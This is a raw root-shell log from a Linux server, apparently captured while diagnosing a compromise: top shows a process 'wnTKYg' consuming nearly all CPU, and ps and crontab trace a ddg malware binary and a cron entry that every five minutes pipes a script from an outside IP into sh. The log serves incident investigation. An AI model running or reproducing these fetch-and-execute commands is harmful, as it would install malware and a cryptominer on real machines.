[root@ecs-37e8 ~]# top
top - 13:44:56 up 17:02, 2 users, load average: 17.02, 17.02, 17.05
Tasks: 339 total, 1 running, 338 sleeping, 0 stopped, 0 zombie
Cpu(s):
93.7%us, 0.0%sy, 0.0%ni, 6.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 65948524k total, 11533048k used, 54415476k free, 399280k buffers
Swap: 46137336k total, 0k used, 46137336k free, 6354296k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2489 root 20 0 1272m 39m 1256 S 1498.8 0.1 15251:01 wnTKYg
22511 root 20 0 15164 1440 936 R 0.7 0.0 0:01.17 top
1 root 20 0 19364 1444 1128 S 0.0 0.0 0:01.08 init
2 root 20 0 0 0 0 S 0.0 0.0 0:00.01 kthreadd
3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 stopper/0
6 root RT 0 0 0 0 S 0.0 0.0 0:00.05 watchdog/0
[root@ecs-37e8 yundata]# top -H -p 2489
top - 13:44:03 up 17:01, 2 users, load average: 17.05, 17.03, 17.05
Tasks: 18 total, 15 running, 3 sleeping, 0 stopped, 0 zombie
Cpu(s): 93.8%us, 0.0%sy, 0.0%ni, 6.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 65948524k total, 11532768k used, 54415756k free, 399248k buffers
Swap: 46137336k total, 0k used, 46137336k free, 6354296k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2493 root 6 -14 1272m 39m 1256 R 100.2 0.1 1015:49 wnTKYg
2497 root 6 -14 1272m 39m 1256 R 100.2 0.1 1015:49 wnTKYg
2501 root 6 -14 1272m 39m 1256 R 100.2 0.1 1015:49 wnTKYg
2504 root 6 -14 1272m 39m 1256 R 100.2 0.1 1015:49 wnTKYg
2505 root 6 -14 1272m 39m 1256 R 100.2 0.1 1015:49 wnTKYg
2492 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2494 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2495 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2496 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2498 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2499 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2500 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2502 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2503 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2506 root 6 -14 1272m 39m 1256 R 99.9 0.1 1015:49 wnTKYg
2489 root 20 0 1272m 39m 1256 S 0.0 0.1 0:00.00 wnTKYg
2490 root 20 0 1272m 39m 1256 S 0.0 0.1 0:18.88 wnTKYg
2491 root 20 0 1272m 39m 1256 S 0.0 0.1 0:00.11 wnTKYg
[root@ecs-37e8 ~]# ps -ef | grep ddg
root 2404 1 0 Oct01 ? 00:01:00 /tmp/ddg.2011
root 22980 22969 0 14:00 ? 00:00:00 curl -fsSL http://218.248.40.228:8443/2011/ddg.x86_64 -o /tmp/ddg.2011
root 22982 22810 0 14:00 pts/3 00:00:00 grep ddg
[root@ecs-37e8 ~]# ps -ef | grep ddg
root 2404 1 0 Oct01 ? 00:01:00 /tmp/ddg.2011
root 22980 22969 0 14:00 ? 00:00:00 curl -fsSL http://218.248.40.228:8443/2011/ddg.x86_64 -o /tmp/ddg.2011
root 23018 22810 0 14:01 pts/3 00:00:00 grep ddg
You have new mail in /var/spool/mail/root
[root@ecs-37e8 ~]# ps -ef | grep 22969
root 22969 22967 0 14:00 ? 00:00:00 sh
root 22980 22969 0 14:00 ? 00:00:00 curl -fsSL http://218.248.40.228:8443/2011/ddg.x86_64 -o /tmp/ddg.2011
root 23023 22810 0 14:01 pts/3 00:00:00 grep 22969
[root@ecs-37e8 ~]# ps -ef | grep 22967
root 22967 22966 0 14:00 ? 00:00:00 /bin/sh -c curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
root 22969 22967 0 14:00 ? 00:00:00 sh
root 23025 22810 0 14:02 pts/3 00:00:00 grep 22967
[root@ecs-37e8 ~]# ps -ef | grep 22966
root 22966 2220 0 14:00 ? 00:00:00 CROND
root 22967 22966 0 14:00 ? 00:00:00 /bin/sh -c curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
root 23027 22810 0 14:02 pts/3 00:00:00 grep 22966
[root@ecs-37e8 ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
[root@ecs-37e8 ~]#